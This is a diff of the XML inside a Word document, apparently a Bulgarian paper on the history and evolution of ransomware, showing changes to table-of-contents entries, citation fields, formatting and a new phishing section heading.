         <w:spacing w:line="276" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="276" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -526,12 +663,12 @@
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
             <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -543,7 +680,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc223346837" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361337" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -571,7 +708,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346837 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361337 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -606,15 +743,15 @@
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
             <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346838" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361338" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -649,7 +786,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346838 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361338 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -684,15 +821,15 @@
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
             <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346839" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361339" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -727,7 +864,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346839 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361339 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -763,15 +900,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346840" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361340" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -783,7 +920,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -821,7 +958,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346840 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361340 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -857,15 +994,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346841" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361341" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -877,7 +1014,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -930,7 +1067,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346841 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361341 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -966,15 +1103,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346842" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361342" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -987,7 +1124,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1018,7 +1155,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346842 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361342 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1054,15 +1191,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346843" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361343" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1075,7 +1212,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1128,7 +1265,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346843 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361343 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1164,15 +1301,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346844" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361344" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1184,7 +1321,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1230,7 +1367,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346844 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361344 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1265,15 +1402,15 @@
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
             <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346845" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361345" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1308,7 +1445,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346845 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361345 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1344,15 +1481,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346846" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361346" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1364,7 +1501,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1409,7 +1546,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346846 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361346 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1445,15 +1582,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346847" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361347" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1466,7 +1603,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1496,7 +1633,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346847 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361347 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1532,15 +1669,15 @@
             <w:pStyle w:val="TOC2"/>
             <w:tabs>
               <w:tab w:val="left" w:pos="720"/>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346848" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361348" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1552,7 +1689,7 @@
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                 <w:noProof/>
-                <w:lang w:eastAsia="bg-BG"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1582,7 +1719,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346848 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361348 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1603,6 +1740,101 @@
                 <w:webHidden/>
               </w:rPr>
               <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="720"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+              <w:noProof/>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc223361349" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>4.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Phishing </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>атаки</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361349 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1617,15 +1849,15 @@
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
             <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9062"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
               <w:noProof/>
-              <w:lang w:eastAsia="bg-BG"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223346849" w:history="1">
+          <w:hyperlink w:anchor="_Toc223361350" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1652,7 +1884,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223346849 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223361350 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1672,7 +1904,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1684,6 +1916,17 @@
           </w:hyperlink>
         </w:p>
         <w:p>
+          <w:pPr>
+            <w:sectPr>
+              <w:headerReference w:type="default" r:id="rId13"/>
+              <w:footerReference w:type="default" r:id="rId14"/>
+              <w:pgSz w:w="11906" w:h="16838"/>
+              <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="709" w:footer="709" w:gutter="0"/>
+              <w:cols w:space="708"/>
+              <w:titlePg/>
+              <w:docGrid w:linePitch="360"/>
+            </w:sectPr>
+          </w:pPr>
           <w:r>
             <w:rPr>
               <w:b/>
@@ -1696,25 +1939,12 @@
     </w:sdt>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Aptos" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading1"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223346837"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223361337"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -1831,7 +2061,16 @@
         <w:t xml:space="preserve">по репутацията </w:t>
       </w:r>
       <w:r>
-        <w:t>са значителни. Възстановяването след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. Последиците се усещат както по време на първоначалното прекъсване, така и дълго след това.</w:t>
+        <w:t>са значителни. Възстановяването след подобна атака е трудно и скъпо. Засегнати могат да бъдат организации от всякакъв мащаб. Последиците се усещат както п</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:t>о време на първоначалното прекъсване, така и дълго след това.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -1872,6 +2111,94 @@
         </w:rPr>
         <w:t>ransomware.</w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:id w:val="1603299047"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[1]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:id w:val="758795052"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Ran \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t xml:space="preserve"> </w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[2]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1895,7 +2222,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223346838"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223361338"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -2096,6 +2423,44 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:rPr>
+            <w:lang w:val="en-US"/>
+          </w:rPr>
+          <w:id w:val="1977027603"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[3]</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:lang w:val="en-US"/>
+            </w:rPr>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2106,7 +2471,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223346839"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223361339"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -2133,7 +2498,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223346840"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223361340"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2251,6 +2616,35 @@
       <w:r>
         <w:t>съобщението за откуп.</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="147718911"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION Kur22 \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[3]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:r>
@@ -2275,7 +2669,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId15">
                       <a:duotone>
                         <a:schemeClr val="bg2">
                           <a:shade val="45000"/>
@@ -2405,7 +2799,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223346841"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc223361341"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2470,6 +2864,32 @@
       <w:r>
         <w:t xml:space="preserve"> (фиг. 3). </w:t>
       </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="352465324"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
+          <w:r>
+            <w:instrText xml:space="preserve"> CITATION arc \l 1026 </w:instrText>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="separate"/>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>[4]</w:t>
+          </w:r>
+          <w:r>
+            <w:fldChar w:fldCharType="end"/>
+          </w:r>
+        </w:sdtContent>
+      </w:sdt>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2497,7 +2917,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2627,6 +3047,67 @@
       <w:r>
         <w:t>.</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:sdt>
+        <w:sdtPr>
+          <w:id w:val="389242632"/>
+          <w:citation/>
+        </w:sdtPr>
+        <w:sdtContent>
+          <w:r>
+            <w:fldChar w:fldCharType="begin"/>
+          </w:r>
